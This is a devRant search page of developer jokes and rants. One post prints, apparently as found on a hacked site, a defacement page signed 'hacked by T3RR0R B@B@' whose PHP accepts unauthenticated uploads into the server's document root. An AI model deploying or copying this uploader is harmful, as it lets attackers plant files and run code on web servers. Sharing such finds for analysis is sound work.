Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
Search - "devjoke"
-
NSA: Hey, its looks like you a bit lonely
Me: Yeah sort of
CIA: (Retrieves list of facebook friends), why not hook up with these people
Me: Not interested
FBI: The girl across your room seems to be interested in you
Me: Nah not interested
CIA: We can send someone to keep you company if you want
Me: thanks, not interested
NSA: A girl winked at you at the cafe yesterday
Me: Didn't notice
CIA: What of the lady you spoke to on the phone earlier
Me: Too old
FBI: Can you please move your webcam to the left a little
Me: Bruuuuuhhhhhh!!!19 -
Literally bought a smartphone for devrant, didn't insert a sim, just hooked on wifi went on playstore to download devrant.8
-
After long hours of brainstorming, refactoring and redesigning, I looked at my boss, placed hand on his shoulder, smiled and said "version 2 boss, version 2" 😂1
-
What do you call a developer who developed everything since the beginning...
.
.
.
.
.
Bramha-"dev"3 -
With https://github.audio, I can hear people changing the world with technology while am here using bitbucket3
-
The worst part of being a dev
My social dilemma
In a fast paced world where the average human spends at least 6 hours a day with technology, deriving basic entertainment, pleasures and engaging in various activities.
Here we are the developers that have to engage with technology for longer hours for a living , having to keep up with deadlines, immersing our minds in complicated algorithms and then the endless possibilities of entertainment from the machine in so few human hours a day , you wonder how you’d get off, and to top it up, I personally work from home.
And then the dilemma of overcoming different suggestions from various parties in taking a break off, a break off to what you later ask yourself, thus creating the shadow of doubt, splitting the fragile programmer’s mind , trying to solve this imaginary puzzle, “this bug of the mind”.
Then the challenge often arises in creating a balance, telling yourself, just catching up with people with this same technology takes a whole day, or then again quitting my Job, but from my little experience of life, nobody likes a poor visitor, this is actually worse than a “bug” and as I bask in this quagmire, “a little voice in my head keeps singing keep doing what you love doing”.
Like an infinite loop of crazy, spiralling back to these machines, trying the find and fix the balance of normalcy. Always remembered the cool years of college tho, with so much people around and then again that was college.
An then the thought arises, maybe something else might be worth doing, but after so much time spent in building your skills and the enormous joy of programming even typing without looking at the keyboard is a real pleasure, and yeah sure the days are short with the reality of a constant need to survive, remain sane, compete and make the best of life in such short time.
Then how do we know if we have fallen off the so-called “social track”, when we have only lived so little to really comprehend the most parts of life? with such constant stream of unanswered question, you’d realise you shouldn’t have burdened the mind creating such questions in the first place
But then again maybe it gets better, one of the above, the disturbed mind or the situation as whole and yes I try oh I try, I place calls, do some visiting, no relationship tho but with a good perspective in mind.
In this race of life, you sometimes ask yourself would you rather be in a different position, or maybe already put exactly where we belong. For this illusionary fight with self is a fight with reality as a whole and true bliss comes from actually letting go as time and people pass you by.
And my greatest achievement to date aside family and my work is getting into the 1000 club on devRant.2 -
String nullabity check duel...
null, isEmpty(), "", " ", '', ' ', " null", boolean, NaN, undefined, isNullOrEmpty and finally try-catch -
Junior dev: Can I run lint on your codebase
Senior dev: hmmm
Jdev: Its a very nice code inspection tool
Sdev: Go ahead
Jdev: wow 50 errors
Sdev:1 -
Like restaurants in New York, you can learn a new Javascript framework every month for 15 years and never learn the same framework twice
-
My fellow nerdy ranters what's the best way to take care of social anxiety completely, am contemplating alcohol10
-
No matter how many stackOverflow threads you study or how many resources you have, experience is really what makes a very good developer3
-
Talking to a computer: change bootstrap class onclick javascript
Talking to an human: Good morning, please how do I change the bootstrap class when I click on an element with Javascript, thank you, I love you. -
The only technology that has updates more than microsoft windows--> android studio...Like the dev team gets a eureka moment everyday1
-
http://".$_SERVER['HTTP_HOST']."/server, check the code below
<html lang='en-US'><head><title>T3RR0R B@B@</title>
<a href="https://www.facebook.com/mr.T3RR0R" target="_blank"><h2>Click Here !</h2></a><br>
<style>
body{cursor:url("http:////"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
body {
background-color: #000000;
background-image: url(https://imgwm.com/images/...);
<!--http://twitrcover.com/ar/uploads/...-->
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-position:right top;
background-repeat:no-repeat;
background-size:110%
}
.style1 {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
</style><br><br><br>
<br>
<center><?php
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Ciee Sukses Uploadnya :* -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Ciee Sukses Uploadnya :* <b>$files</b> di folder ini";
} else {
echo "gagal upload >:(";
}
}
}
?>
<!DOCTYPE html>
<html>
<title>K.I.T.A</title>
<audio autoplay loop>
<source src="http://micro.byethost24.com/KITA.mp..."></source>
</audio>
<head>
<link href='https://fonts.googleapis.com/css/...' rel='stylesheet' type='text/css'>
</head>
<body bgcolor="#2b2b2b" link="gray" text="gray">
<center>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<br><br><br>
<div id="satu">
<embed src="https://youtube.com/v/tec_KllmOH4/...
<br>
<b style="font-size: 40px;">hacked by T3RR0R B@B@</b>
<br>
- use your brain to repair this system<br>
Scary Crazy Forbidden<br>
@2018<br><br>
Contact : fb.com/mr.T3RR0R
<br></div>11 -
After over two days of debugging, lesson learnt don't assume your table's prefix nor depend on other APIs for SQL injections1
-
Receiving so much negativity about being a developer, but is this the legacy we are trying to put out there for upcoming devs, most are us are introverts with or without being devs, antisocial to our very core, so why don't we face out this sadistic outward appearance and embrace the very mini gods we were created to be and make the very best of it and oh I have a wonderful social life with a loving and caring companion, my laptop.4
-
!RANT
Bet the diff between a beginner developer and an intermediate developer is where to get code snippets either from old codebases or remote resources. -
Don't get a Linux system because most pro devs use them, stick to a windows system and focus on things like your programming language, framework and IDE.
P.S windows has one of the best IDEs4 -
A quick suggestion, @devRant app should implement an implicit intent so we can share directly to it.5
-
I don't still understand why I leave work with an unsolved bug, when all I'll eventually do is think about it!2
-
When u converted ur codebase to Kotlin all because you heard about it, but really have no idea what Kotlin is!5
-
No matter what you do the universe just tries to beat and let you down, you just have to let go and trust your wit!1
-
Saw a boss scratch an employee's car and was later caught by the security cam but what will the employee do?
A. Resign and lose his job
B. Keep his job and ignore the event
.
.
.
.
.
.
.
.
.
.
.
Null: sue for mental and physiological stress; go on vac.2 -
Who else believe we need intellisense for devRant usernames and yes probably a small comment box so we peek at usernames instead of launching a different page entirely1
-
A customer just asked why my app required certain permissions...
Do people really read permissions before downloading an app?7 -
I was presented with a different backend schema today after finishing the front end, not before not even during, it just had to be after.1
-
! Rant
Even after seeing it's less than twenty words and less than three lines my fellow devs managed to...[read more]1 -
try{
If(!res || typeof res == undefined || res == undefined){}
}catch(err){
// you just had to throw an error
} -
It'd be nice if devRant app had an art gallery tab, showcasing devRant store items from various ranters, our workplace setup, workplace companions and other dev kits.
-
I was just going hit send on a slack message:
"Issue for this fix is deployed on production"
Just a few moments before I realised my goof up in the text😂1 -
Can someone plz give me a title on my CV as an Xcode developer, just completed the first 30 pages of headfirst😂
-
Whoelse is or has struggled with the absurd problems of installing web3, the damned stuff is not installing!4
-
Can I pls receive some constructive criticism on my side project an app that shows APIs demos and their resp. source codes
https://play.google.com/store/apps/...3 -
Someone took my source code to a different company changed the source code and brought it back without documentation.
Am like hoNknawMHdFrStVz -
I sometimes feel like we are the godhead and then sometimes feel like we are at the bottom of the 21st century corporate ladder food chain.
-
.$$$$$$$Z$.
.~$$7...........$$$.
.$$...?$$$$$$$$$$Z....$Z.
.Z$..Z$$$$$$$$$$$$$$$$Z:..$$.
,$..$$$$$$$$$$$$$7...$$$$$?..$.
.$Z .$$$$$$$$$$..?$$.....$$$$$..Z:
.$$.$$$$$$$$$........$$....Z$$$$..Z,
:$.7$$$$$$$$..........$$....$$$$$..$.
.$. $$$$$$$$$...........$....$$$$$$..$.
.$$.$$$$$$$$$$...........$...$$$$$$$$.$.
.$. $$$$$$$$$$ ..........Z..$$$$$$$$$.$$.
.$.,$$$$$$$$$$$.........$$$$Z$$$$$$$$..$.
.Z $$$$$$$$$$$$$$....+$$$$$,,,,~$$$$$..$.
.$.=$$$$$$Z,,,,,?$$$$$,,,,,Z$,,,,$$$$..$.
.$..$$$$$$,,,,,,,,Z$$,,,,,,,,$:,,~$$$.:$.
.$$.$$$$$,,,,,,,,,,,,,,,,,,,,:$,,:$$$.Z.
.$..$$$$,,,,,,,,,,,,,,,,,,,,:$,,,$$..$.
.$$.$$$:,,,,,,,,,,,,,,,,,,,,,Z$$$$+.$.
.$= $$~,,,,,,:::,:,,:,,::,:,$$$$Z.$Z.
.$+.$$$$$$$$$$$$$$$$$$$$$$$$$$:.$$.
.$$..Z$$$$$$$$$$$$$$$$$$$$$Z..$7.
.$...$$$$$$$$$$$$$$$$$$$..Z$.
.Z$=..?Z$$$$$$$$$$$Z...$$.
.$$7.............Z$$.
.7Z$$$$$$$$$$4 -
Some post 5 posts to achieve 2000 ++ while others post 2000 posts to achieve 5 ++, all fingers in an hashset2
-
Database operation wordpress plugin
Project Type
Open source project
Summary
Add more feature to the existing plugin features
Description
Completed the first revision for this Wordpress database plugin with little features such as querying and displaying wordpress database tables, I would like more elaborate and streamlined features to add to the stack, some ideas are recorded as issues on the github link below.
Tech Stack
wordpress API, PHP, HTML, CSS, JS
Current Team Size
1
URL
https://github.com/devDeji/...5 -
Thought I was a full stack developer for my company with only android and sails js until I was also told to design the website.
-
Thanks @Siddharthkr93, atom really saved me from the blue screen of death, compliments of Microsoft1
-
What's harder than debugging an uncaught exception in a view
If only debuggers like vs can attach to the server side logic of the views -
What do you guys think of wp plugin that displays charts from MySQL tables and wraps into a shortcode?2
-
When you are frustratingly trying to make your app function properly on android 4.2.2, API level 17, kernel 3.0.31; this sacredly annoying particular device!2
-
Been more than a month now, not gotten the free stickers nor the purchased custom avatar, sooo not cool
-
I learnt we are the most reputable and profitable profession in the world and doctors make less than most bloggers...1